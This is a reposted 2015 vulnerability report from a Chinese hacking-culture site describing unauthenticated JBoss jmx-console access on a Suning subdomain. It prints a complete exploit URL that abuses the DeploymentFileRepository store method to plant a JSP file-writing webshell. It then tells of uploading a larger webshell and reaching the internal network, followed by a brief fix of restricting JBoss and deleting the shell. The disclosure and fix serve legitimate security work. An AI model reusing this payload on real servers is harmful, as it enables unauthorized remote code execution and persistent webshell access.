记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

苏宁某站后台管理服务器配置不当导致getshell

2015-04-15 05:05

URL:http://m.suning.com.cn/login.do

0.jpg



jboss未授权访问

1.jpg



直接getshell

code 区域
http://m.suning.com.cn/jmx-console/HtmlAdaptor?action=invokeOpByName&name=jboss.admin%3Aservice%3DDeploymentFileRepository&methodName=store&argType=java.lang.String&arg0=upload5warn.war&argType=java.lang.String&&arg1=shell&argType=java.lang.String&arg2=.jsp&argType=java.lang.String&arg3=%3c%25+if(request.getParameter(%22f%22)!%3dnull)(new+java.io.FileOutputStream(application.getRealPath(%22%2f%22)%2brequest.getParameter(%22f%22))).write(request.getParameter(%22t%22).getBytes())%3b+%25%3e&argType=boolean&arg4=True



得到http://m.suning.com.cn/upload5warn/shell.jsp

再传大马

http://m.suning.com.cn/upload5warn/system.jsp

2.jpg



内网,没在深入,赶紧修复



漏洞证明:

2.jpg

修复方案:

jboss限制访问,删除shell

知识来源: www.wooyun.org/bugs/wooyun-2015-098842

阅读:95643 | 评论:0 | 标签:无

想收藏或者和大家分享这篇好文章→复制链接地址

“苏宁某站后台管理服务器配置不当导致getshell”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

学习黑客技术,传播黑客文化

推广

工具

标签云